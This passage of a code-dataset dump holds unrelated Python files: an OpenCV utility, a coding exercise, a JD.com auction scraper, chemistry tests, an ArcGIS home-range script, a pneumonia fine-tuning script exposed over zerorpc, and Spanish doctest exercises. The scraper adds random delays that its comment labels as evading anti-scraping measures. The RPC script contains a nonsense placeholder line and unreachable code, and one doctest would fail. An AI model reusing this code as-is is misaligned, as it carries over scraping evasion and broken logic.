文字をのせるためのマットを作成する\n    overlay = img.copy()\n    pt1 = (0, 0)\n    pt2 = (int(img.shape[1] * w_ratio), int(img.shape[0] * h_ratio))\n    mat_color = (99, 98, 97)  # RGB C5C6C7\n    fill = -1  # -1にすると塗りつぶし\n    cv.rectangle(overlay, pt1, pt2, mat_color, fill)\n    mat_img = cv.addWeighted(overlay, alpha, img, 1 - alpha, 0)\n    draw_texts(mat_img, texts)\n    return mat_img\n\n\n# original https://github.com/Kazuhito00/mediapipe-python-sample\nclass CvFpsCalc(object):\n    def __init__(self, buffer_len=1):\n        self._start_tick = cv.getTickCount()\n        self._freq = 1000.0 / cv.getTickFrequency()\n        self._difftimes = deque(maxlen=buffer_len)\n\n    def get(self):\n        current_tick = cv.getTickCount()\n        different_time = (current_tick - self._start_tick) * self._freq\n        self._start_tick = current_tick\n        self._difftimes.append(different_time)\n        fps = 1000.0 / (sum(self._difftimes) / len(self._difftimes))\n        fps_rounded = round(fps, 2)\n        return fps_rounded\n","sub_path":"cv_util.py","file_name":"cv_util.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172075901","text":"# Medium Codewriting 300\n#\n# You are given an array of desired filenames in the order of their creation. 
Since two files cannot have equal names, the one which comes later will have an addition to its name in a form of (k), where k is the smallest positive integer such that the obtained name is not used yet.\n#\n# Return an array of names that will be given to the files.\n#\n# Example\n#\n# For names = [\"doc\", \"doc\", \"image\", \"doc(1)\", \"doc\"], the output should be\n# fileNaming(names) = [\"doc\", \"doc(1)\", \"image\", \"doc(1)(1)\", \"doc(2)\"].\n#\n# Input/Output\n#\n# [execution time limit] 4 seconds (py3)\n#\n# [input] array.string names\n#\n# Guaranteed constraints:\n# 5 ≤ names.length ≤ 1000,\n# 1 ≤ names[i].length ≤ 15.\n#\n# [output] array.string\n\ndef fileNaming(names):\n result = []\n\n for i in range(len(names)):\n num = 1\n if names[i] not in result:\n result.append(names[i])\n continue\n\n while names[i] in result:\n stay = names[i] + '(' + str(num) + ')'\n if stay in result:\n while stay in result:\n num += 1\n stay = names[i] + '(' + str(num) + ')'\n result.append(stay)\n break\n result.append(stay)\n break\n\n return result","sub_path":"codesignal/Intro/Land of Logic/File Naming.py","file_name":"File Naming.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299018489","text":"import csv\nimport re\nimport time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\nCOUNT = 0 # 爬取计数\n\n\ndef get_things_links(url, mode1='w'):\n web_data = requests.get(url)\n web_soup = BeautifulSoup(web_data.text, 'lxml')\n cout_line = 0\n with open('网页地址.csv', mode1, newline='') as file_web:\n for links in web_soup.select('.name a'):\n links = 'http:' + links.get('href')\n data_file2 = csv.writer(file_web)\n data_file2.writerow([links])\n cout_line += 1\n return print('Done 完成一页的爬取,等待五分钟后继续,第一页有{}条'.format(cout_line))\n\n\ndef get_things_info(things_url): # 商品详细信息获取\n data_file_line = []\n browser = webdriver.PhantomJS()\n browser.get(things_url)\n time.sleep(1) # 浏览器缓冲\n web_soup = BeautifulSoup(browser.page_source, 'lxml')\n browser.quit()\n\n start_or_not = web_soup.select('#auction1Timer')[0].text\n start_or_not = re.findall(u'([0-9]+)', start_or_not)\n end_or_not = web_soup.select('#auction3Timer')[0].text\n end_or_not = re.findall(u'[0-9]+', end_or_not)\n if start_or_not:\n print('还没开始,还剩{}'.format(start_or_not))\n elif end_or_not:\n print('正在竞拍,还剩{}'.format(end_or_not))\n else:\n tit = web_soup.select('div.name')[0]\n used = tit.text.split(' ')\n title = tit.get('title')\n shiyong = re.findall(u'([\\u4e00-\\u9fa5]+)', used[0])\n waigaun = web_soup.select('span.item_facade_info')[0].text\n baozhuang = web_soup.select('span.pack_facade_info')[0].text\n\n cost = web_soup.select('.cost')[0]\n cost = re.findall(u'\\d+\\.?\\d*', cost.text)\n\n if cost:\n pass\n else:\n cost = ['1', '1', '1']\n try:\n weiguan = cost[0]\n jiage = cost[1]\n fengding = cost[-1]\n except:\n jiage = '出错'\n\n ending = web_soup.select('#auctionStatus2 > div.auction_intro > div.intro_timer > span.color33')[0].text\n ending = ending.split(' ')\n ending_date = ending[0]\n ending_time = ending[-1]\n\n bid_count_ = web_soup.select('#bidCount')[0]\n bid_count = re.findall(u'[0-9]+', bid_count_.text)\n if bid_count:\n pass\n else:\n bid_count = ['0']\n if float(fengding):\n price_off = float('%.3f' % (float(jiage) / float(fengding) * 100))\n else:\n price_off = '出错'\n number = things_url.split('/')\n number = number[-1]\n data_file_line.append(ending_date) # 结束日期\n 
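# Note (added): keep this append order in sync with the header row ['结束日期', '结束时间', ...] written to 商品数据.csv at module level below.\n        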
data_file_line.append(ending_time) # 结束时间\n data_file_line.append(bid_count[0]) # 拍卖次数\n data_file_line.append(title) # 拍卖物品\n data_file_line.append(shiyong[0]) # 使用情况\n data_file_line.append(waigaun) # 商品外观\n data_file_line.append(baozhuang) # 商品包装\n data_file_line.append(weiguan) # 围观数\n data_file_line.append(jiage) # 最终价格\n data_file_line.append(fengding) # 封顶价格\n data_file_line.append(price_off) # 折扣数\n data_file_line.append(number) # 商品编号\n\n global COUNT\n COUNT += 1\n print(data_file_line)\n with open('商品数据.csv', 'a', newline='') as file:\n data_file2 = csv.writer(file)\n data_file2.writerow(data_file_line)\n print(\"成功写入!已经成功爬取{}条信息\".format(COUNT))\n\n\nduobao_url = 'http://dbd.jd.com/auctionList.html?t=1&t=1&sortField=2&limit=40&page=1' # 夺宝岛的网址\n\nwith open('商品数据.csv', 'w', newline='') as file1:\n data_file = csv.writer(file1)\n data_file.writerow(['结束日期', '结束时间', '拍卖次数', '拍卖物品', '使用情况', '商品外观', '商品包装', '围观数', '最终价格', '封顶价格', '折扣', '商品编号'])\n\ncout = 0\nset_cout = int(input('请输入要抓取的页数'))\n\nwhile cout < set_cout:\n get_things_links(url=duobao_url)\n with open('历史网页地址.csv', 'a', newline='') as file3:\n file3.write(open('网页地址.csv', 'r', newline='').read()) # 保存网页地址\n print('成功') # 获取网页的链接\n time.sleep(200)\n print('还剩100秒')\n time.sleep(100)\n print('开始爬网页详细信息')\n with open('网页地址.csv', 'r', newline='') as file2:\n reader2 = csv.reader(file2)\n for url in reader2:\n print('正在爬' + url[0])\n get_things_info(things_url=url[0])\n stop_time = random.uniform(8, 15) # 反爬,随机生产访问间隔时间\n time.sleep(stop_time)\n cout += 1\nprint('搞定!')\n","sub_path":"爬虫练习/京东夺宝岛.py","file_name":"京东夺宝岛.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341444445","text":"import stk\n\n\ndef test_mmff(amine2):\n mmff = stk.MMFFEnergy()\n assert mmff.energy(amine2) < mmff.energy(amine2, 1)\n\n\ndef test_uff(amine2):\n uff = stk.UFFEnergy()\n assert uff.energy(amine2) < uff.energy(amine2, 1)\n\n\ndef test_cache_use(amine2):\n mmff = stk.MMFFEnergy()\n mmff.energy(amine2)\n # Since use_cache is False the cache should be empty.\n assert not mmff.cache\n\n # To test that the cache is not being used, put a random object\n # into it, and test that it was not returned.\n obj = object()\n mmff.cache[(amine2.key, 1)] = obj\n assert mmff.energy(amine2, 1) is not obj\n\n # Test that the cache is being filled when use_cache is True.\n cached_mmff = stk.MMFFEnergy(use_cache=True)\n assert not cached_mmff.cache\n cached_mmff.energy(amine2)\n assert cached_mmff.cache\n\n # Test that the cache is being used by putting a random object into\n # it and making sure it gets returned.\n cached_mmff.cache[(amine2.key, 1)] = obj\n assert cached_mmff.energy(amine2, 1) is obj\n\n\ndef test_formation(polymer, amine2):\n mmff = stk.MMFFEnergy(use_cache=True)\n\n water = stk.StructUnit.smiles_init('[H]O[H]')\n products = [water]*3\n formation = stk.FormationEnergy(\n energy_calculator=mmff,\n reactants=polymer.building_blocks,\n products=products)\n\n reactant_energy = sum(\n mmff.energy(bb) for bb in polymer.building_blocks\n )\n product_energy = mmff.energy(water)*3 + mmff.energy(polymer)\n formation_energy = product_energy - reactant_energy\n assert formation.energy(polymer) - formation_energy < 1e-4\n","sub_path":"tests/test_energy_calculators.py","file_name":"test_energy_calculators.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
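A note on the 京东夺宝岛 scraper record above: its `except` branch assigns only `jiage`, so when the scraped `cost` list has fewer entries than expected, `fengding` is never bound and the later `if float(fengding)` check raises a `NameError`. Below is a minimal sketch of a safer unpacking under the same watchers/price/cap layout; `unpack_cost` is a hypothetical helper, not part of the record, and the variable names simply mirror the record's.

```python
# Hypothetical helper sketching a safer fallback for the scraper's price
# parsing. It pads short lists so all three fields are always defined,
# mirroring the record's existing ['1', '1', '1'] default for empty lists.
def unpack_cost(cost):
    if not cost:
        cost = ['1', '1', '1']
    while len(cost) < 3:
        cost.append(cost[-1])  # repeat the last value instead of crashing
    weiguan, jiage, fengding = cost[0], cost[1], cost[-1]
    return weiguan, jiage, fengding

print(unpack_cost(['12', '99.5', '199']))  # ('12', '99.5', '199')
print(unpack_cost(['12']))                 # ('12', '12', '12')
```

With the three names always bound, the record's later `float(fengding)` guard can no longer hit an undefined variable.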
+{"seq_id":"473129556","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\"\"\"\r\nhrOverlap.py\r\n\r\nCreated by Theron Terhune and Brant Faircloth on 2008-02-11.\r\nCopyright (c) 2008 Theron Terhune and Brant Faircloth. All rights reserved.\r\n\r\nComputes home range overlap between individuals. \r\n\r\nRequires: \r\n\r\n1) a folder of individual home ranges (wspace + \"indiv\")\r\n2) a shapefile containing all home ranges (wspace + \"dissolve.shp\")\r\n\r\nwspace = the base folder of both the files above\r\n\r\nwe re adding a field to the output with gp.AddField_management called bird_ref,\r\nthis is because we work on birds, and bird_ref is the id of the individual to \r\nwhich the base is being compared.\r\n\r\n\"\"\"\r\n\r\n# Import system modules\r\nimport sys, string, os, arcgisscripting, pdb\r\n\r\n# Create the Geoprocessor object\r\ngp = arcgisscripting.create()\r\n\r\n# allows you to overwrite files -- 0 is default which prevents you from overwriting files and therefore gives error msg\r\ngp.overwriteoutput = 1\r\n\r\n# Load required toolboxes...\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Conversion Tools.tbx\")\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Analysis Tools.tbx\")\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Data Management Tools.tbx\")\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Spatial Statistics Tools.tbx\")\r\n\r\n# define the base workspace\r\nwspace = \"C:\\\\Documents and Settings\\\\bcf\\\\Desktop\\\\maps\\\\breedingHomeRanges\\\\kernel\\\\breeding\\\\dissolved\\\\2001\\\\\"\r\n# define a place for temp files (trash)\r\ntrashSpace = wspace + \"NewTrash\\\\\"\r\n\r\ndef createFolder():\r\n #create 2 new folders for new shapefiles created in the this script\r\n output_location = wspace\r\n output_folder = \"NewTrash\"\r\n output_location2 = trashSpace\r\n output_folder2 = \"NewClips\"\r\n # Process: Create Folder...\r\n gp.CreateFolder_management(output_location, output_folder)\r\n gp.refreshcatalog(output_location)\r\n gp.CreateFolder_management(output_location2, output_folder2)\r\n gp.refreshcatalog(output_location2)\r\n \r\ndef newFeature(): # this function creates a shapefile with all home ranges except for the individual of interest\r\n # create workspace -- this is the folder with the individual MCPs\r\n gp.workspace = wspace + \"indiv\"\r\n # base_shp is the base shapefile with all MCPs merged\r\n base_shp = wspace + \"dissolve.shp\"\r\n # out_ws is variable name indicating where output is to be placed\r\n out_ws = trashSpace\r\n # Get a list of the feature classes (polygons only) in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n while fc:\r\n # Process: Feature Class to Feature Class...\r\n # listfc is variable name splitting feature class names obtained from gp.ListFeatureClasses\r\n listfc = fc.split(\".\")\r\n # newfc creates variable appending the SQl syntax and individual id found in the shapefile attribute table (in this case the column is MCP_ID)\r\n newfc = ((\"Names <> '%s'\") % (listfc[0]))\r\n # FeatureclassToFeatureclass_conversion {where_clause} {field_mapping} {config_keyword} \r\n gp.FeatureClassToFeatureClass_conversion(base_shp, out_ws, fc, newfc)\r\n fc = fcs.next()\r\n\r\ndef newClip():\r\n #pdb.set_trace()\r\n # create workspace --- these are the individuals home range 
shapefiles\r\n gp.workspace = wspace + \"indiv\"\r\n # create workspace #2 --- these are the combined home range shapefiles created from newFeature (above; i.e. w/o individual for clipping)\r\n workspace2 = trashSpace\r\n out_ws = trashSpace + \"NewClips\\\\\"\r\n # Get a list of the feature classes in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n while fc:\r\n # Process: Feature Class to Feature Class...\r\n listfc = fc.split(\".\")\r\n newfc = (workspace2 + fc) # assigns name to apprapriate shapefile (= shapefile w/all MCPs except individual) \r\n clipname = out_ws + (('Clip_' + '%s' + '.shp') % (listfc[0])) # assigns a new name to the clip feature for each individual\r\n gp.Clip_analysis(newfc, fc, clipname, \"\") \r\n fc = fcs.next()\r\n\r\ndef addField():\r\n # create workspace --- these are the individuals home range shapefiles\r\n gp.workspace = trashSpace + \"NewClips\\\\\"\r\n # Get a list of the feature classes in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n while fc:\r\n listfc = fc.split(\".\")\r\n newlist = listfc[0].split(\"_\")\r\n BirdRef = ((\"'%s'\") % (newlist[1]))\r\n gp.AddField_management(fc, \"Bird_ref\", \"TEXT\", \"\", \"\", \"\", \"\", \"NON_NULLABLE\", \"NON_REQUIRED\", \"\")\r\n gp.CalculateField_management(fc, \"Bird_ref\", BirdRef, \"PYTHON\", \"\")\r\n fc = fcs.next()\r\n\r\ndef mcpMerge():\r\n # create workspace --- these are the individual 'modified' (from above functions) home range\r\n gp.workspace = trashSpace + \"NewClips\\\\\"\r\n outfc = trashSpace + \"NewClips\\\\FinalMcpMerged.shp\"\r\n # Get a list of the feature classes in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n inputs = fc # sets string variable to be insert into Merge tool below\r\n fc = fcs.next()\r\n while fc:\r\n inputs = inputs + \";\" + fc\r\n fc = fcs.next() \r\n gp.Merge_management(inputs, outfc)\r\n\r\ndef calcArea():\r\n # create workspace --- these are the individual 'modified' (from above functions) home range shapefiles\r\n shape = trashSpace + \"NewClips\\\\FinalMcpMerged.shp\"\r\n outshape = wspace + \"FinalMcpMerged.shp\"\r\n gp.CalculateAreas_stats(shape, outshape)\r\n outshape2 = wspace + \"FinalMcpMerged.shp\"\r\n gp.AddField_management(outshape2, \"Acres\", \"DOUBLE\", \"\", \"\", \"\", \"\", \"NON_NULLABLE\", \"NON_REQUIRED\", \"\")\r\n gp.AddField_management(outshape2, \"Hectares\", \"DOUBLE\", \"\", \"\", \"\", \"\", \"NON_NULLABLE\", \"NON_REQUIRED\", \"\")\r\n gp.CalculateField_management(outshape2, \"Acres\", \"[F_AREA]*0.0002471054\", \"VB\", \"\")\r\n gp.CalculateField_management(outshape2, \"Hectares\", \"[F_AREA]*0.0001\", \"VB\", \"\")\r\n\r\ndef deleteFolders():\r\n # delete folders and shapefiles that you created except final shapefile with individual information\r\n byebye = trashSpace\r\n gp.delete_management(byebye)\r\n\r\n\r\ncreateFolder() 
\r\nnewFeature()\r\nnewClip()\r\naddField()\r\nmcpMerge()\r\ncalcArea()\r\ndeleteFolders()\r\n","sub_path":"homeRange/hrOverlap.py","file_name":"hrOverlap.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587714283","text":"import argparse\r\nimport os\r\nimport configparser\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nfrom collections import Counter\r\nfrom misc_functions import *\r\nimport torch\r\nimport torchvision\r\nfrom torch import nn, optim\r\nfrom torchvision import datasets\r\nimport torchvision.transforms as T\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom torchvision.utils import make_grid\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport zerorpc\r\n\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n'''\r\nreferenced https://www.kaggle.com/vatsalmavani/pneumonia-classification-using-pre-trained-model/notebook?select=Pneumonia_model.pt \r\nfor the original model weights and preprocessing/training steps\r\n\r\n'''\r\n\r\nclass HelloRPC(object):\r\n def hello(self, name):\r\n return \"Hello, %s\" % name\r\n\r\n def finetune(self, id, model_path, image_path):\r\n print(id)\r\n print(model_path)\r\n print(image_path)\r\n\r\n #fine_tune(args)\r\n return json.dumps({saldalsjdlajdaslkdjasldjasjdasljdal})\r\n return \"Its working\"\r\n\r\n# parser = argparse.ArgumentParser(description='Process arguments')\r\n# parser.add_argument('-n', '--num_freeze', type=int, default=2)\r\n\r\n# args = parser.parse_args()\r\n\r\n# data_dir = './chest_xray'\r\n\r\ndef evaluate_performance(preds, labels):\r\n preds = torch.exp(preds)\r\n top_p,top_class = preds.topk(1, dim=1)\r\n equals = top_class == labels.view(*top_class.shape)\r\n test_acc = torch.mean(equals.type(torch.FloatTensor))\r\n return test_acc\r\n \r\ndef test_model(test_loader, model, eval_dict, purpose_stamp, device):\r\n model.eval()\r\n criterion = nn.CrossEntropyLoss()\r\n test_loss = 0\r\n test_acc = 0\r\n for images,labels in tqdm(test_loader):\r\n\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n\r\n preds = model(images)\r\n loss = criterion(preds,labels)\r\n test_loss += loss.item()\r\n test_acc += evaluate_performance(preds,labels)\r\n\r\n avg_test_loss = test_loss/len(test_loader)\r\n avg_test_acc = test_acc/len(test_loader)\r\n\r\n print(purpose_stamp + \" - Test Loss : {:.6f} Test Acc : {:.6f}\".format(avg_test_loss,avg_test_acc))\r\n\r\n eval_dict[purpose_stamp]['Avg_Accuracy'] = avg_test_acc\r\n eval_dict[purpose_stamp]['Avg_loss'] = avg_test_loss\r\n\r\n return eval_dict\r\n\r\ndef get_arch(model_path, pretrained, test_stamp):\r\n if test_stamp=='pneumonia':\r\n model = torchvision.models.vgg19(pretrained=pretrained)\r\n # add Linear classifier layer\r\n in_features = model.classifier[0].in_features\r\n classifier = nn.Sequential(\r\n nn.Linear(in_features, 4096),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.5),\r\n nn.Linear(4096, 4096),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.5),\r\n nn.Linear(4096, 2),\r\n nn.LogSoftmax(dim=1)\r\n )\r\n model.classifier = classifier\r\n return model\r\n\r\ndef get_model(model_path, device, num_freeze, test_stamp, num_class=2, pretrained=True):\r\n\r\n model = get_arch(model_path, pretrained, test_stamp)\r\n model.load_state_dict(torch.load(model_path), strict=False)\r\n # load_state_dict(torch.load(PATH), strict=False)\r\n model.to(device)\r\n torch.save(model, 
'./model/pneumonia_id/save_new_model.pt')\r\n input('asdf')\r\n layer_lst = []\r\n\r\n # get the number of layers \r\n for name, param in model.named_parameters():\r\n layer_lst.append(name)\r\n\r\n total_num_layers = len(layer_lst)\r\n input(model)\r\n input('need to parse the architecture')\r\n\r\n loop_ctr = 0\r\n freezing_ctr = 0\r\n # freeze the model layer\r\n # https://discuss.pytorch.org/t/how-the-pytorch-freeze-network-in-some-layers-only-the-rest-of-the-training/7088/2\r\n for name, param in model.named_parameters():\r\n # bias and weights included, so each layer will have 2 counts of 'param'\r\n if loop_ctr < total_num_layers-(num_freeze*2):\r\n param.requires_grad = False\r\n else:\r\n param.requires_grad = True\r\n freezing_ctr += 1\r\n loop_ctr += 1\r\n\r\n # input('freezing_ctr ' + str(freezing_ctr))\r\n print('freezing_ctr ' + str(freezing_ctr))\r\n\r\n return model\r\n\r\n# define augmentation\r\ndef apply_transform(mode=None):\r\n# same preprocessing as the original trained model for pneumonia\r\n if mode == 'train_noise':\r\n transform = T.Compose([T.Resize((256,256)),\r\n T.RandomHorizontalFlip(),\r\n T.RandomRotation((-20,+20)),\r\n T.CenterCrop(224),\r\n T.ToTensor(),\r\n T.Normalize([0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225])\r\n ])\r\n\r\n elif mode == 'test_noise' or mode == 'val_noise':\r\n transform = T.Compose([T.Resize((256,256)),\r\n T.CenterCrop(224),\r\n T.ToTensor(),\r\n T.Normalize([0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225])\r\n ])\r\n \r\n return transform\r\n\r\ndef fine_tune(data_dir='./chest_xray', model_path_OG='./model/pneumonia_id', test_stamp='penumonia', num_freeze=2, epochs=10, acc_threshold=0):\r\n start = time.time()\r\n model_path = os.path.join(model_path_OG, 'pretrained_model.pt')\r\n \r\n # TEST = 'test'\r\n TEST = 'test_noise'\r\n TRAIN = 'train_noise'\r\n # VAL = 'val_noise'\r\n\r\n # Initialize dataset\r\n\r\n trainset = datasets.ImageFolder(os.path.join(data_dir, TRAIN),\r\n transform = apply_transform(TRAIN))\r\n\r\n # valset = datasets.ImageFolder(os.path.join(data_dir,VAL),\r\n # transform = apply_transform(VAL))\r\n\r\n testset = datasets.ImageFolder(os.path.join(data_dir, TEST),\r\n transform = apply_transform(TEST))\r\n\r\n print('Name of Labels:', testset.classes)\r\n print('Index of Labels:', testset.class_to_idx)\r\n\r\n eval_dict = { 'original': {'Avg_Accuracy': 'value_1', 'Avg_loss': 'value_1'},\r\n 'fine-tuned': {'Avg_Accuracy': 'value_2', 'Avg_loss': 'value_1'}}\r\n\r\n train_loader = DataLoader(trainset,\r\n batch_size=8,\r\n shuffle=True)\r\n\r\n test_loader = DataLoader(testset,\r\n batch_size=8)\r\n\r\n # val_loader = DataLoader(valset,\r\n # batch_size=8)\r\n\r\n\r\n print('Training Images:')\r\n dataiter = iter(train_loader)\r\n images,labels = dataiter.next()\r\n print(\"shape of images : {}\".format(images.shape))\r\n print(\"shape of labels : {}\".format(labels.shape))\r\n\r\n # print('\\nValidation Images:')\r\n # dataiter = iter(val_loader)\r\n # images,labels = dataiter.next()\r\n # print(\"shape of images : {}\".format(images.shape))\r\n # print(\"shape of labels : {}\".format(labels.shape))\r\n\r\n print('\\nTest Images:')\r\n dataiter = iter(test_loader)\r\n images,labels = dataiter.next()\r\n print(\"shape of images : {}\".format(images.shape))\r\n print(\"shape of labels : {}\".format(labels.shape))\r\n\r\n # need to find number of unique labels\r\n num_class = len(testset.classes)\r\n print(\"number of classes: {}\".format(str(num_class)))\r\n\r\n # model = TheModelClass(*args, **kwargs)\r\n 
model = get_model(model_path, device, num_freeze, test_stamp, num_class=num_class, pretrained=True)\r\n # model = torch.load('./model/pneumonia_id/save_new_model.pt')\r\n ''' baseline without tuning '''\r\n # low LR for fine tuning\r\n optimizer = optim.Adam(model.parameters(), lr=0.001)\r\n schedular = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.1, patience=5)\r\n\r\n purpose_stamp = 'original'\r\n eval_dict = test_model(test_loader, model, eval_dict, purpose_stamp, device)\r\n\r\n # input('done original testing')\r\n train_loss_min = np.Inf\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n ''' fine tune model ''' \r\n # for epoch in range(epochs):\r\n epoch = 0 \r\n best_train_acc = 0\r\n # keep training until accuracy threshold AND the specified number of epochs\r\n while best_train_acc < acc_threshold or epoch < epochs or epoch > 20:\r\n epoch += 1\r\n print('training epoch number:', epoch)\r\n\r\n train_loss = 0.0\r\n val_loss = 0.0\r\n train_acc = 0.0\r\n val_acc = 0.0\r\n \r\n model.train()\r\n for images,labels in tqdm(train_loader):\r\n optimizer.zero_grad()\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n\r\n preds = model(images)\r\n loss = criterion(preds, labels)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n train_loss += loss.item()\r\n train_acc += evaluate_performance(preds, labels)\r\n\r\n avg_train_loss = train_loss / len(train_loader)\r\n avg_train_acc = train_acc / len(train_loader)\r\n\r\n schedular.step(avg_train_loss)\r\n\r\n print(\"Epoch : {} \\ntrain_loss : {:.6f}, \\tTrain_acc : {:.6f}\".format(epoch + 1, avg_train_loss, avg_train_acc))\r\n\r\n if avg_train_loss <= train_loss_min:\r\n print('Training loss decreased from ({:.6f} --> {:.6f}).\\nSaving model ...'.format(train_loss_min, avg_train_loss))\r\n torch.save(model.state_dict(), os.path.join(model_path_OG,'finetuned_model.pt'))\r\n train_loss_min = avg_train_loss\r\n best_train_acc = avg_train_acc\r\n\r\n # model.eval()\r\n # with torch.no_grad():\r\n # for images,labels in tqdm(val_loader):\r\n # images = images.to(device)\r\n # labels = labels.to(device)\r\n\r\n # preds = model(images)\r\n # loss = criterion(preds, labels)\r\n # val_loss += loss.item()\r\n # val_acc += evaluate_performance(preds, labels)\r\n\r\n # avg_val_loss = val_loss / len(val_loader)\r\n # avg_val_acc = val_acc / len(val_loader)\r\n\r\n # schedular.step(avg_train_loss)\r\n\r\n # print(\"Epoch : {} \\ntrain_loss : {:.6f}, \\tTrain_acc : {:.6f}, \\nVal_loss : {:.6f}, \\tVal_acc : {:.6f}\".format(epoch + 1,\r\n # avg_train_loss, avg_train_acc,\r\n # avg_val_loss, avg_val_acc))\r\n # if avg_val_loss <= val_loss_min:\r\n # print('Validation loss decreased from ({:.6f} --> {:.6f}).\\nSaving model ...'.format(val_loss_min, avg_val_loss))\r\n # torch.save(model.state_dict(), 'Pneumonia_model.pt')\r\n # val_loss_min = avg_val_loss\r\n\r\n\r\n\r\n model.load_state_dict(torch.load(os.path.join(model_path_OG,'finetuned_model.pt')), strict=False)\r\n # load_state_dict(torch.load(PATH), strict=False)\r\n model.to(device)\r\n purpose_stamp = 'fine-tuned'\r\n eval_dict = test_model(test_loader, model, eval_dict, purpose_stamp, device)\r\n print(eval_dict)\r\n\r\n print(\"Total duration:\")\r\n end = time.time()\r\n print(end - start)\r\n\r\nif __name__ == \"__main__\":\r\n s = zerorpc.Server(HelloRPC())\r\n s.bind(\"tcp://0.0.0.0:4242\")\r\n s.run()\r\n fine_tune(data_dir='./data/pneumonia_id', model_path_OG='./model/pneumonia_id', test_stamp='pneumonia', num_freeze=2, epochs=10, 
acc_threshold=0.8)","sub_path":"saves/58af6e/train_noise/py/main_script_rpc.py","file_name":"main_script_rpc.py","file_ext":"py","file_size_in_byte":11492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157580419","text":"def mensaje_negativo(numero):\n \"\"\"\n (float) -> str\n\n Escribe un mensaje para evaluar un numero negativo\n\n >>> mensaje_negativo(-10.0)\n 'El numero es negativo'\n\n >>> mensaje_negativo(898)\n 'El numero es positivo'\n\n :param numero: num el numero a evaluar\n :return: str con el mensaje de la evaluación\n \"\"\"\n if numero < 0:\n return 'El numero es negativo'\n return 'El numero es positivo'\n\ndef compara_edades(edad1, edad2):\n \"\"\"\n (int, int) -> str\n\n Genera un mensaje segun la diferencia de edad:\n la primera o la segunda mas joven o iguales\n\n >>> compara_edades(10, 20)\n 'El primero es mas joven'\n\n >>> compara_edades(89, 56)\n 'El segundo es mas joven'\n\n >>> compara_edades(56, 56)\n 'Tienen la misma edad'\n\n :param edad1: int la edad del primero\n :param edad2: int la edad del segundo\n :return: mensaje asociado a la diferencia de edad\n \"\"\"\n if edad1 > edad2:\n return 'El segundo es mas joven'\n elif edad1 == edad2:\n return 'Tienen la misma edad'\n else:\n return 'El primero es mas joven'\n\n\ndef es_parentesis(caracter):\n \"\"\"\n\n (str of len == 1) -> str\n\n >>> es_parentesis('(')\n 'Es parentesis'\n >>> es_parentesis('x')\n 'No es parentesis'\n >>> es_parentesis('xa')\n Traceback (most recent call last):\n ..\n TypeError: xa no es un parentesis\n\n :param caracter: str el caracter a evaluar\n :return: str el mensaje de la validacion\n \"\"\"\n if len(caracter) != 1:\n raise TypeError(str(caracter) + ' no es un parentesis')\n elif caracter in '()': # caracter == '(' or caracter == ')':\n return 'Es parentesis'\n return 'No es parentesis'\n\n\ndef dividir(dividendo, divisor):\n '''\n\n (num, num) -> num\n\n Divide un numero entre otro\n\n >>> dividir(6, 2)\n 3.0\n >>> dividir(1,0)\n Traceback (most recent call last):\n ..\n ZeroDivisionError: No dividiras por 0\n >>> dividir('hola', 100)\n Traceback (most recent call last):\n ..\n TypeError: hola no es un numero\n\n :param dividendo: num el dividendo a evaluar\n :param divisor: num el divisor a evaluar\n :return: la división entre dividendo y divisor\n '''\n if int != type(dividendo) != float:\n raise TypeError(str(dividendo) + ' no es un numero')\n elif int != type(divisor) != float:\n raise TypeError(str(divisor) + ' no es un numero')\n elif divisor == 0:\n print('al pelo')\n raise ZeroDivisionError('No dividiras por 0')\n return dividendo / divisor\n\ndef par_impar(num):\n \"\"\"\n num -> str\n\n Entra un numero y sale si es par o impar\n\n :param num: numero a ser revisado\n :return: mensaje dejando saber si es par o no\n\n >>> par_impar(6)\n 'Es par'\n >>> par_impar(7)\n 'Es impar'\n >>> 